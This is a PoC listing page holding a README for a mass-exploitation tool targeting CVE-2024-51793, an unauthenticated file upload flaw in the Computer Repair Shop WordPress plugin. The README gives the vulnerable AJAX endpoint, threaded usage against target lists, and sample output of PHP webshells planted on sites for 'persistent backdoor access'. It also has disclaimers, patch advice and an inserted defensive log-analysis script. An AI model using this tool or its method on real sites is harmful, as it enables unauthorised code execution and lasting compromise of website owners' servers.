PoC details: af1ba0692a01986437c111b927af2121210b13e4

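Related vulnerability
Title: WordPress plugin Computer Repair Shop code issue vulnerability (CVE-2024-51793)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports hosting personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin Computer Repair Shop version 3.8115 and earlier contain a code issue vulnerability, which stems from an unrestricted upload of files with dangerous types.
Introduction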
CVE-2024-51793 Exploit Tool Documentation
📋 Overview
CVE-2024-51793 is an unauthenticated arbitrary file upload vulnerability in the Computer Repair Shop WordPress plugin (versions prior to 3.8116). This vulnerability allows attackers to upload arbitrary files, including PHP webshells, without authentication, leading to remote code execution on vulnerable WordPress sites.

🚨 Vulnerability Details
CVE ID: CVE-2024-51793

Vulnerability Type: Unauthenticated Arbitrary File Upload

Affected Plugin: Computer Repair Shop WordPress Plugin

Affected Versions: < 3.8116

Risk Level: Critical (CVSS Score: 9.8)

🔧 Technical Details
The vulnerability exists in the wc_upload_file_ajax action handler in the plugin, which fails to properly validate file types and user authentication, allowing unauthenticated attackers to upload malicious files directly to the server.

📦 Installation & Requirements
Prerequisites
Python 3.6+

Required packages: requests

Installation
```bash
# Clone or download the script
git clone <repository-url>
cd cve-2024-51793-exploit

# Install required packages
pip install requests

# Or if you have requirements.txt
pip install -r requirements.txt
```
🛠️ Usage Guide
Basic Usage
```bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 50
```
Advanced Usage
```bash
# With custom output directory
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results

# With verbose output (if implemented)
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose
```
Command Line Arguments
Argument	Short	Description	Default
--list	-l	Path to file containing target URLs (required)	-
--threads	-t	Number of concurrent threads	50
--output	-o	Output directory for results	results
Input File Format
Create a text file (targets.txt) with one URL per line:

```text
example.com
https://vulnerable-site.com
http://192.168.1.100/wordpress
test-site.org/blog
```
🔍 How It Works
1. Target Validation
The script first checks if the target is running the vulnerable plugin version by examining:

```text
/wp-content/plugins/computer-repair-shop/readme.txt
```
2. Version Detection
It verifies the plugin contains "CRM WordPress Plugin" and the version is below 3.8116.

3. Exploitation
If vulnerable, the script uploads a PHP webshell via:

```text
POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax
```
4. Webshell Payload
The uploaded webshell provides:

File upload capability

Basic file management

Persistent backdoor access

📊 Output Files
The tool generates two main output files:

vulnerable_targets.txt - List of confirmed vulnerable URLs

webshells.txt - List of successfully uploaded webshell URLs

🎯 Example Execution
```bash
$ python3 cve_2024_51793_exploit.py -l targets.txt -t 30

    ╔══════════════════════════════════════════════════════════════╗
    ║                                                              ║
    ║  CVE-2024-51793 Exploit Tool                                ║
    ║  Unauthenticated RCE in Computer Repair Shop WP Plugin      ║
    ║                                                              ║
    ╚══════════════════════════════════════════════════════════════╝

 [ INFO ] Loaded 150 unique targets
 [ INFO ] Starting scan with 30 threads

 [ SCANNING ] Checking: http://example.com/
 [ VULNERABLE ] Target identified: http://example.com/
 [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php

 [ SCANNING ] Checking: http://testsite.com/
 [ NOT VULNERABLE ] Target: http://testsite.com/

 [ COMPLETED ] Scan finished successfully
```
🛡️ Defensive Measures
For Website Owners
Immediate Actions:

Update Computer Repair Shop plugin to version 3.8116 or later

Remove any uploaded malicious files

Scan for existing compromises

Preventive Measures:

Implement web application firewalls (WAF)

Regular security audits

File integrity monitoring
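
For the "scan for existing compromises" step above, a log triage sketch (an added example, not part of the original README or the tool): it flags POSTs to the wc_upload_file_ajax action and requests for PHP files under wp-content/uploads, and correlates the two by client IP. The combined access log format, the sample lines and the names `analyze`, `LOG_RE`, `PHP_IN_UPLOADS` and `SAMPLE_LOG` are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed input: Apache/Nginx "combined" access log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Script extensions that should never be served from the media library.
PHP_IN_UPLOADS = re.compile(r"/wp-content/uploads/.+\.(php\d?|phtml|phar)$", re.I)

def analyze(lines):
    """Flag upload-handler POSTs, PHP requests under uploads, and IPs doing both."""
    attempts, php_hits, uploaders, correlated = [], [], set(), set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        try:
            url = urlsplit(m["target"])
        except ValueError:
            continue  # malformed request target
        actions = parse_qs(url.query).get("action", [])
        if (m["method"] == "POST"
                and url.path.endswith("/wp-admin/admin-ajax.php")
                and "wc_upload_file_ajax" in actions):
            attempts.append((m["ip"], m["time"], m["status"]))
            uploaders.add(m["ip"])
        elif PHP_IN_UPLOADS.search(url.path):
            php_hits.append((m["ip"], m["time"], url.path, m["status"]))
            # Same client used the upload handler earlier and the file was served.
            if m["ip"] in uploaders and m["status"] == "200":
                correlated.add(m["ip"])
    return {"upload_attempts": attempts, "php_under_uploads": php_hits,
            "correlated_ips": sorted(correlated)}

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2024:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax HTTP/1.1" 200 87 "-" "python-requests/2.31"',
    '203.0.113.7 - - [12/May/2024:10:01:03 +0000] "GET /wp-content/uploads/2024/05/sample_upload.php HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '198.51.100.9 - - [12/May/2024:10:05:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/May/2024:10:05:09 +0000] "GET /wp-content/uploads/2024/05/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(key, value)
```

Any PHP file served from the uploads directory deserves investigation on its own, so pair the log review with a filesystem check of wp-content/uploads.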

For Security Researchers
Use only in authorized environments

Follow responsible disclosure practices

Obtain proper permissions before testing

⚠️ Legal & Ethical Considerations
This tool is for educational and authorized security testing only

Unauthorized use against systems you don't own is illegal

Always obtain proper authorization before penetration testing

Follow responsible disclosure practices for found vulnerabilities

🔄 Maintenance
Updates
Regularly check for:

Script updates and improvements

Changes in vulnerability status

New detection methods

Troubleshooting
Common issues and solutions:

Connection Timeouts: Increase timeout values in session configuration

False Negatives: Verify target URLs are accessible

Rate Limiting: Reduce thread count and add delays

📞 Support
For issues and improvements:

Create issues on the project repository

Contact: TG: @KtN_1990

Disclaimer: This tool should only be used for legitimate security research and authorized penetration testing. The authors are not responsible for any misuse or damage caused by this tool.
File snapshot

[4.0K] /data/pocs/af1ba0692a01986437c111b927af2121210b13e4
├── [10.0K] CVE-2024-51793.py
└── [5.2K] README.md

0 directories, 2 files